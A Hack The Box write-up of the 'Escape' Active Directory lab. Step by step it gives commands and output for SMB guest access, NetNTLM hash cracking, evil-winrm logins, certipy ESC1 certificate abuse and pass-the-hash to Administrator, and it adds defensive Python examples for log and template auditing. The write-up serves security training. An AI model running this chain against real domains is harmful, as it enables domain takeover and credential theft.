HTB - Escape

Description
Escape is a Medium difficulty Windows Active Directory machine that starts with an SMB share from which guest-authenticated users can download a sensitive PDF file. Inside the PDF file, temporary credentials are available for accessing an MSSQL service running on the machine. An attacker is able to force the MSSQL service to authenticate to his machine and capture the hash. It turns out that the service is running under a user account and the hash is crackable. Having a valid set of credentials, an attacker is able to get command execution on the machine using WinRM. Enumerating the machine, a log file reveals the credentials for the user ryan.cooper. Further enumeration of the machine reveals that a Certificate Authority is present and one certificate template is vulnerable to the ESC1 attack, meaning that users who are eligible to use this template can request certificates for any other user on the domain, including Domain Administrators. Thus, by exploiting the ESC1 vulnerability, an attacker is able to obtain a valid certificate for the Administrator account and then use it to get the hash of the administrator user.
Enumeration
Nmap Scan
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $ nmap -p1-10000 --min-rate 10000 $ip -Pn -oN Nmap/10000-port-scan
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $sudo nmap -sU -p1-10000 --min-rate 10000 $ip -Pn -oN Nmap/udp-scan
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $ nmap -p53,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389 -sCV $ip -Pn -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain?
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-03 17:36:48Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
|_ssl-date: 2024-11-03T17:39:50+00:00; +8h00m00s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-03T17:39:50+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2024-11-03T17:39:50+00:00; +8h00m00s from scanner time.
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-11-03T17:33:04
|_Not valid after: 2054-11-03T17:33:04
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-03T17:39:50+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-03T17:39:50+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Summary
* Open ports: 53,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389
* UDP open ports: 53,88,123,389
* Services: DNS - Kerberos - RPC - SMB - LDAP - LDAPS - MSSQL - WinRM - NTP
* Important notes: DNS:dc.sequel.htb - Domain: sequel.htb - Microsoft SQL Server 2019
hosts file
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $sudo sh -c "echo '$ip dc dc.sequel.htb sequel.htb ' >> /etc/hosts"
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $tail -n1 /etc/hosts
10.10.11.202 dc dc.sequel.htb sequel.htb
Kerberos Enumeration
I started my enumeration process by brute-forcing Kerberos, since I need a domain account to attack the box as there is no web server here, but with no luck.
kerbrute userenum -d sequel.htb --dc $ip jsmith.txt -o users

SMB & RPC Enumeration
I then moved to the SMB and RPC services, looking for misconfigurations in shared folder permissions or RPC. I found I had READ access on the Public share and no access to RPC.
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $rpcclient -U '%' $ip -c enumdomusers
The result was NT_STATUS_ACCESS_DENIED.

I connected to the share and downloaded a PDF file from it.
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $impacket-smbclient sequel.htb/guest:''@dc
# shares
ADMIN$
C$
IPC$
NETLOGON
Public
SYSVOL
# use Public
# ls
drw-rw-rw- 0 Sat Nov 19 06:51:25 2022 .
drw-rw-rw- 0 Sat Nov 19 06:51:25 2022 ..
-rw-rw-rw- 49551 Sat Nov 19 06:51:25 2022 SQL Server Procedures.pdf
# get SQL Server Procedures.pdf
After opening the file, I noticed there are credentials at the end of it.

Foothold
PublicUser:GuestUserCantWrite1
I can access the database with these creds :))

When I deal with MSSQL, I go through a checklist of possible attack paths, so I will create one:
* Check for admin access
* Check the databases for juicy info and secrets
* Check the possibility of capturing the MSSQL service account hash
* Check for impersonating other users
* Check for trustworthy databases
* Check for linked servers
* Check for read or write access to the file system
* Check for executing commands with xp_cmdshell
SQL (PublicUser guest@master)> enum_db
name is_trustworthy_on
------ -----------------
master 0
tempdb 0
model 0
msdb 1
SQL (PublicUser guest@master)> enum_links
SRV_NAME SRV_PROVIDERNAME SRV_PRODUCT SRV_DATASOURCE SRV_PROVIDERSTRING SRV_LOCATION SRV_CAT
---------- ---------------- ----------- -------------- ------------------ ------------ -------
DC\SQLMOCK SQLNCLI SQL Server DC\SQLMOCK NULL NULL NULL
SQL (PublicUser guest@master)> enum_impersonate
execute as database permission_name state_desc grantee grantor
---------- -------- --------------- ---------- ------- -------
SQL (PublicUser guest@master)> enum_users
UserName RoleName LoginName DefDBName DefSchemaName UserID SID
------------------ -------- --------- --------- ------------- ---------- -----
dbo db_owner sa master dbo b'1 ' b'01'
guest public NULL NULL guest b'2 ' b'00'
INFORMATION_SCHEMA public NULL NULL NULL b'3 ' NULL
sys public NULL NULL NULL b'4 ' NULL
Nothing is interesting so far, but I got the hash of the service account using a local SMB server.

The hash is cracked successfully
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $hashcat -m 5600 sql.hash /usr/share/wordlists/rockyou.txt
..snip..
SQL_SVC::sequel:aaaaaaaaaaaaaaaa:afe08a49ef50bb618c7ebe172f3fc719:01010000000000008014fb68d92ddb01dff7d14561d219d700000000010010006a006c00720069006500550047005300030010006a006c007200690065005500470053000200100071004c0043004300780042007a0049000400100071004c0043004300780042007a004900070008008014fb68d92ddb01060004000200000008003000300000000000000000000000003000008ab9cecef8fc5bd1bf12dec37969b9f951514a8bb2b1613c8c474ba64776dcc40a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e00310032000000000000000000:REGGIE1234ronnie
Session..........: hashcat
Status...........: Cracked
I can also access the database with the new account.

The account doesn't have special permissions, so I will move to WinRM.
SQL (sequel\sql_svc guest@master)> SELECT IS_SRVROLEMEMBER('sysadmin')
-
0
Lateral Movement
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $evil-winrm -i dc -u sql_svc -p REGGIE1234ronnie
*Evil-WinRM* PS C:\Users\sql_svc\Documents>
Under C:\SQLServer\Logs, there is a .bak file containing log info of the MSSQL instance. What is interesting is that I find Ryan.Cooper trying to log in and failing. Maybe I can use this string as a password: NuclearMosquito3
*Evil-WinRM* PS C:\SQLServer\Logs> dir
Directory: C:\SQLServer\Logs
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/7/2023 8:06 AM 27608 ERRORLOG.BAK
*Evil-WinRM* PS C:\SQLServer\Logs> type ERRORLOG.BAK
..snip..
2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
..snip..
And the password is correct :))
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $nxc ldap dc -u Ryan.Cooper -p NuclearMosquito3
LDAPS 10.10.11.202 636 DC [+] sequel.htb\Ryan.Cooper:NuclearMosquito3
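The ERRORLOG pattern above (a failure for a real account followed, from the same client, by a "user" that is really a password) is something a defender can hunt for in SQL Server logs. The following is an added Python example, not part of the original write-up; the log lines are constructed in the shape of the excerpt above, and the heuristic (non-principal name within a few seconds of a real failure from the same client) is my own.

```python
import re
from datetime import datetime

# Constructed sample in the shape of the ERRORLOG.BAK excerpt above (not the real file).
SAMPLE_LOG = """\
2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:45:00.00 Logon       Logon failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
"""

# One "Logon failed for user '...'" line: timestamp, the name that was tried, client address.
FAILED_LOGON_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2})\s+Logon\s+"
    r"Logon failed for user '(?P<user>[^']+)'\..*\[CLIENT: (?P<client>[^\]]+)\]"
)


def parse_failed_logons(text):
    """Yield (timestamp, attempted_name, client) for every failed-logon line."""
    for line in text.splitlines():
        m = FAILED_LOGON_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
            yield ts, m["user"], m["client"]


def find_leaked_secrets(text, known_logins=("sa",), window_s=5):
    """Flag a failed logon whose 'user' is not a principal (no DOMAIN\\ or @,
    not a known SQL login) and that follows, within window_s seconds and from
    the same client, a failure for a real account: the classic sign that a
    password was typed into the username field and now sits in the log.
    Returns (timestamp, suspect_string, client, preceding_account) tuples."""
    findings = []
    last_by_client = {}
    for ts, user, client in parse_failed_logons(text):
        is_principal = "\\" in user or "@" in user or user.lower() in known_logins
        prev = last_by_client.get(client)
        if not is_principal and prev and (ts - prev[0]).total_seconds() <= window_s:
            findings.append((ts, user, client, prev[1]))
        last_by_client[client] = (ts, user)
    return findings


if __name__ == "__main__":
    for ts, secret, client, account in find_leaked_secrets(SAMPLE_LOG):
        # Report without echoing the suspected secret in full.
        print(f"{ts} {client}: '{secret[:3]}...' tried right after {account}; "
              "rotate that account's password and redact the log")
```

A hit means the log file itself now holds a credential, so rotating the preceding account's password and restricting who can read the SQL log directory are the two fixes that matter.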
Privilege Escalation
I accessed the machine as Ryan and found he is a member of Certificate Service DCOM Access.

I need to enumerate the PKI of the domain since this group exists. A CA is found in the domain with the name sequel-DC-CA.
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $nxc ldap dc -u Ryan.Cooper -p NuclearMosquito3 -M adcs
LDAPS 10.10.11.202 636 DC [+] sequel.htb\Ryan.Cooper:NuclearMosquito3
ADCS 10.10.11.202 389 DC [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS 10.10.11.202 389 DC Found PKI Enrollment Server: dc.sequel.htb
ADCS 10.10.11.202 389 DC Found CN: sequel-DC-CA
Then, I looked at vulnerable templates for possible escalation paths (ESC).
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $certipy find -u Ryan.Cooper@sequel.htb -p NuclearMosquito3 -vulnerable -stdout
Template Name : UserAuthentication
Display Name : UserAuthentication
Certificate Authorities : sequel-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
..snip..
[!] Vulnerabilities
ESC1 : 'SEQUEL.HTB\\Domain Users' can enroll, enrollee supplies subject and template allows client authentication
The template UserAuthentication is vulnerable to ESC1, which means I can request a certificate with an alternative user principal name (UPN).
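For auditing, the ESC1 verdict above is just the conjunction of a few template settings, and breaking any one of them closes the path. The following is an added Python example, not certipy's code or part of the original write-up: the template record is constructed in the layout of the certipy output above, the "Requires Manager Approval", "Authorized Signatures Required" and "Enrollment Rights" field names are assumed (they are not in the excerpt), and the remediation strings are my own suggestions.

```python
# Constructed record in the layout of the `certipy find -stdout` excerpt above.
SAMPLE_TEMPLATE = """\
Template Name                       : UserAuthentication
Certificate Authorities             : sequel-DC-CA
Enabled                             : True
Client Authentication               : True
Any Purpose                         : False
Enrollee Supplies Subject           : True
Requires Manager Approval           : False
Authorized Signatures Required      : 0
Enrollment Rights                   : SEQUEL.HTB\\Domain Users, SEQUEL.HTB\\Domain Admins
"""

LOW_PRIV_GROUPS = {"domain users", "authenticated users", "domain computers", "everyone"}


def parse_template(text):
    """Turn 'Key : Value' lines into a dict of stripped strings."""
    rec = {}
    for line in text.splitlines():
        if ":" in line:
            key, value = line.split(":", 1)
            rec[key.strip()] = value.strip()
    return rec


def esc1_conditions(rec):
    """Map each ESC1 precondition to whether this template meets it."""
    flag = {k: v == "True" for k, v in rec.items()}
    enrollers = {p.strip().split("\\")[-1].lower()
                 for p in rec.get("Enrollment Rights", "").split(",") if p.strip()}
    return {
        "enabled": flag.get("Enabled", False),
        "enrollee supplies subject": flag.get("Enrollee Supplies Subject", False),
        "client authentication EKU": flag.get("Client Authentication", False)
                                     or flag.get("Any Purpose", False),
        "no manager approval": not flag.get("Requires Manager Approval", False),
        "no authorized signatures": rec.get("Authorized Signatures Required", "0") == "0",
        "low-privileged enrollment": bool(enrollers & LOW_PRIV_GROUPS),
    }


def is_esc1(rec):
    return all(esc1_conditions(rec).values())  # every precondition must hold at once


def remediation(rec):
    """Configuration changes that would each close ESC1 on this template."""
    fixes = []
    if rec.get("Enrollee Supplies Subject") == "True":
        fixes.append("clear CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT so the SAN is built from AD")
    if esc1_conditions(rec)["low-privileged enrollment"]:
        fixes.append("remove Enroll from Domain Users / Authenticated Users")
    return fixes
```

The `Certificate has no object SID` line in the request output below is the weak-mapping case that KB5014754 strong certificate mapping rejects for authentication once in full enforcement; the DC here still issued a TGT for it.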
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $certipy req -u Ryan.Cooper@sequel.htb -p NuclearMosquito3 -upn administrator@sequel.htb -ca sequel-DC-CA -template UserAuthentication
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 15
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $certipy auth -pfx administrator.pfx -dc-ip 10.10.11.202
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5xxxxxxxxxxxxx
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $evil-winrm -i dc -u administrator -H a52f78e4c751e5f5exxxxxxxxxxxx
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
6ecb67c8db147ac353xxxxxxxxxxxxxxx
Root Flag: 6ecb67c8db147ac353xxxxxxxxxxxxxxx